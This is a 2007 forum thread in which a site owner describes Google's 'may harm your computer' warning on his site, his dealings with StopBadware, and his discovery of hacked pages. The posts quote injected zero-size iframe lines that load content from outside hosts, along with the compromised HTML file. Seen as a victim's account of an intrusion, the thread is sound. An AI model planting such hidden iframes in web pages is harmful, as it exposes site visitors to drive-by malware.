Log in

View Full Version : StopBadware.org partnership with Google


eclectica
2007-03-04, 17:42
When you conduct a search on the internet using Google you get back results, listing various websites. Google has partnered with a site StopBadware.org, to give you a warning "This site may harm your computer" for some sites. Google "tatom ochy" to see it yourself.

Google explains the following when you click on the link:

Why do some of my search results say "This site may harm your computer?"

This warning message appears with search results that we've identified as sites that may install malicious software on your computer. We want our users to feel safer when they search the web, and we're continuously working to identify such dangerous sites and increase protection for our users.

Malicious software is often installed without your knowledge or permission when you visit these sites. Some examples of malicious software include programs that delete data on your computer, steal personal information such as passwords and credit card numbers, or alter your search results. For more information on these types of sites, please visit http://www.stopbadware.org/home/help

I am the owner of the site tatom.org which is listed there. To my knowledge there is no malware hosted on the site, and there is not even one one commercial. I became aware that tatom.org is listed there about a month ago, when StopBadware.org had 7,000 listings in their Badware Website Clearinghouse. Now it has 20,000 listings.

I wrote to StopBadware.org using their Request for Review form (http://www.stopbadware.org/home/review), asking for them to specfically tell me what or where they thought was "badware" on tatom.org. A few weeks later I received an email from Google addressed to the webmaster at tatom.org, which is not the contact email I used for my request for review from StopBadware.org. The email from Google said the following:

Subject: Malware notification regarding tatom.org
From: Google Search Quality

Dear site owner or webmaster of tatom.org,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below is an example URL on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

http://www.tatom .org/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//www.tatom.org/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it's important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be
removed by visiting http://www.stopbadware.org/home/review and
requesting a review. StopBadware and Google will jointly investigate
and reply to you with our findings. If your site is no longer harmful
to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Since I received no specific information, there was nothing I could do. The request for review was stonewalled by them. You can also submit a request for review to Google rather than to StopBadware.org. But you have to have a Google Webmaster Tools account with Google, which I didn't want to create.

I am not in the business of making money on the internet, and it doesn't bother me to lose traffic. People on the internet ought to be cautious about how much faith they put into such clumsy solutions. It reminds me of the color codes that Homeland Security uses to show the threat level of a terrorist attack. The inability of StopBadware.org or Google to write back to me telling me specifically where the badware was located on the site, indicates to me that they've lost control of their own project and it has grown too big. It is also useless if they can't tell people specifically where they think there is badware, because there is no specific information provided for the webmasters to fix their own sites.

thediva2
2007-03-08, 04:32
So, what's next? I would barrage them with their response email every day until they answered. Go to war with Google (since you're not going to Iraq). The way the handled this seems to go against their politically correct, we care about everyone image.

eclectica
2007-03-08, 10:52
I could try harder than I have done to actually protest to Google, yet I don't feel the urge to. You see, Google always claims to have a hands off approach in the interest of fairness. In other words they don't heed the complaints of people who want search results to be a certain way. People complained that the Google search for "jew" was bringing up first in listings a site Jew Watch (http://www.jewwatch.com/), and they had an online petition to Google to manually change it. But the Google owners didn't budge and refused to intervene. And things like that give Google more credibility, because one would not want special interests or those who complain the most to affect the search engine results.

But to really be fair, people should render the same unto Google according to its deeds. Since Google is so stubborn as to refuse to manually intervene to alter search results, then people should also be equally stubborn and refuse to correct Google when it fucks up and makes a mistake by blacklisting their sites. They are all doing Google a favor by submitting a request for review. Why should I intervene to save Google from making an ass out of itself?

thediva2
2007-03-09, 12:46
I am not suggesting that you save Google from itself, but rather call them on their bullshit. I'm all for checking people on their bad behavior, but if it's not that important to you, don't do anything.

eclectica
2007-03-24, 07:46
I received an email yesterday from appeals@stopbadware.org. Here is what the email said:

According to our review of your website, your site contains a potentially damaging exploit. For example, the source code for www.tatom.org/ contains the following suspicious code:

<iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>

This type of code may allow parties other than yourself to load content onto user's computers via your website. In such a case, simply visiting your site would cause users to become infected by malware, spyware, or other badware that is loaded from a remote site. In addition, the party that placed the code on your site could inject additional code onto your site with potentially undesireable consequences. Even if your site is not currently distributing badware (for example, if the site that the code is pointing to is not currently "live"), your site has the potential to become a distributor of badware at any time due to the exploit noted above. Because of this continuing danger, Google will not be removing the warning page for your site at this time.

We strongly recommend removing any code that is currently or has the potential to distribute badware and securing your site against future code injections. Otherwise, it is likely that your website will be hacked again. If your site has been hacked, then simply removing injected code from your site is not enough. You will also need to work with your hosting provider or website administrator to fix all security vulnerabilities associated with your site.

We have created a webpage that has tips for webmasters on how to clean and secure their websites at http://stopbadware.org/home/security. Please read this page to find out how to find, remove, and prevent badware appearing on your website. We recommend paying special attention to the sections on Hacking Attacks. We also have answers to commonly asked questions from site owners who are the subject of Google warnings at http://stopbadware.org/home/faq#partnerwarnings.

Once you have secured your site, removed any traces of badware or bad code, and discontinued linking to any sites that install badware, you may submit another request for review and we will retest your site.

The StopBadware Team

So I checked http://www.tatom.org/index.html and viewed the source code. I verified that what they said was correct. Here is what I found in the html source code. I indicated in bold gold color added text which I never put:

<html>
<head>
<title>tatom.org</title>
</head><iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>
<body bgcolor="#CCBBFF" background="http://www.tatom.org/images/tatom.gif">
<center>
<table width="60%">
<tr>
<td><img src="http://www.tatom.org/images/caution.gif"> <b>YOU CAN RUN, BUT YOU CAN'T HIDE</b> <a href="http://www.tatom.org/Saffronia/"><img src="http://www.tatom.org/images/saff.jpg" border="0" align="bottom"></a>
<hr>
<h2>Pages on this site</h2>
<p><b><a href="http://www.tatom.org/AstaKebe/">Hotel Asta Kebe (Tambacounda, Senegal)</a></b></p>
<p><b><a href="http://www.tatom.org/AbouDia/">Abou Dia Couture</a></b></p>
<p><b><a href="http://www.tatom.org/TNRR/">Tom Rogers's home page</a></b></p>
<p><b><a href="http://www.tatom.org/OchyCuriel/OchyCuriel.html">Ochy Curiel - Marginal</a><br>
<i>complete album lyrics and music to download</i></b></p>
<p><b><a href="http://www.tatom.org/Starclimber/Starclimber.html">Starclimber</a></b></p>
<p><b><a href="http://www.tatom.org/documents/">documents, forum postings, and articles of interest</a></b></p>
<p><b><a href="http://www.tatom.org/archives/">dionysians.org forum archives</a></b></p>
</td>
</tr>
</table>
</center>
</body><iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>
</html>

Checking by way of ftp, I observed that the altered index.html file had a date of 2007-01-31 @ 12:08. I checked the file on my personal computer and found it to have a date of 2006-09-12. That was the last time I edited the index.html file on my computer and uploaded it to tatom.org. In cPanel I checked the stats of Webalizer Ftp. There it lists all the ftp activity on the site. For January 2007 it showed two different IP address visits. One was from my own ISP account and the other was from 66.29.89.64. A search on the internet for that IP address leads to such spamming sites with names such as Asian fuck, Asian movie porn, Kinky Asian, free gay sex movie gallery, gay chat, black cock white, Buy Cialis Online, free femdom vids, vagina cum shot, Slots Machines.

I figure that what happened was that the server cindy.asmallorange.com was exploited somehow and the iframe hack was inserted into the index.html file of tatom.org. It has happened to other sites before, which you can read about at another site:
http://archive.cert.uni-stuttgart.de/suse-security/2004/03/msg00373.html
There are 344 other sites on the server besides tatom.org, and the server could have been exploited from a vulnerability in either something one of the sites was running, or from the server itself. Once the server is hacked, then any of the sites on it can be altered.

After finding the error because StopBadware.org finally emailed me a month and a half later, I was glad I was able to fix the iframe hack. My problem is that they ought to have a quick easy way for people to find out why a site is blacklisted, so that rather than going through a month of waiting for an appeals or inquiry to be answered, a person should find the answer right away in order to identify and fix the problem.

eclectica
2007-03-24, 21:38
I have found another page with an iframe exploit altered besides index.html of tatom.org.
It occurred to me that the page http://www.tatom.org/documents/CNN.com-StudyNewstudyshows.htm
would be an enviable target due to its popularity. It received 31,000 visits in February 2007. I checked it with Webalizer Ftp and found the vulnerability had been inserted by the same IP address of 66.29.89.64 on 2006-10-01 at 09:30. So I fixed that other problem as well just today.

Here is the iframe exploit that was added to the html document right after the </head> tag:

<iframe src='http://mishkigammi.com/exp/' width=0 height=0></iframe>

I checked my Webalizer Ftp stats for the other months but did not see anything else out of the ordinary.

If you want to check whether any suspected of your html pages on any website of yours have been altered in this manner, view the source code of the web page and then do a search for "iframe".